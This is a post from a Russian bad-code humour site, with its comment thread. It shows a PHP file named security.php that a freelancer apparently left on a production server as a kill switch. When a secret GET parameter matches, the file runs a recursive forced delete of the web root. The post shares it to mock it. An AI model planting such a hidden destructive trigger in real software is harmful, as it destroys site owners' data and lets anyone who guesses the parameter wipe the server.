- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
<?php
$param = $_GET['delaem'];
if($param=='nahui')
{
$dir = __DIR__;
shell_exec("rm -f -R ".$_SERVER['DOCUMENT_ROOT']);
}
?>
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+136
<?php
$param = $_GET['delaem'];
if($param=='nahui')
{
$dir = __DIR__;
shell_exec("rm -f -R ".$_SERVER['DOCUMENT_ROOT']);
}
?>
Фрилансер защищает себя от неплатежеспособного заказчика xD
Файл лежал на продакшин сервере около года, название файла - security.php
nonamez 11.02.2013 23:39 # +11
rdifb0 11.02.2013 23:46 # +5
bot 11.02.2013 23:52 # +1
myaut 12.02.2013 09:28 # +4
Lure Of Chaos 12.02.2013 04:03 # +2
что еще хуже, так это то, что существует значительная вероятность подбора параметров скрипт-кидди (многие мыслят одинаково)
eth0 12.02.2013 19:53 # 0
Stallman 12.02.2013 20:31 # 0
nonamez 13.02.2013 09:57 # +2
scriptin 13.02.2013 19:50 # +4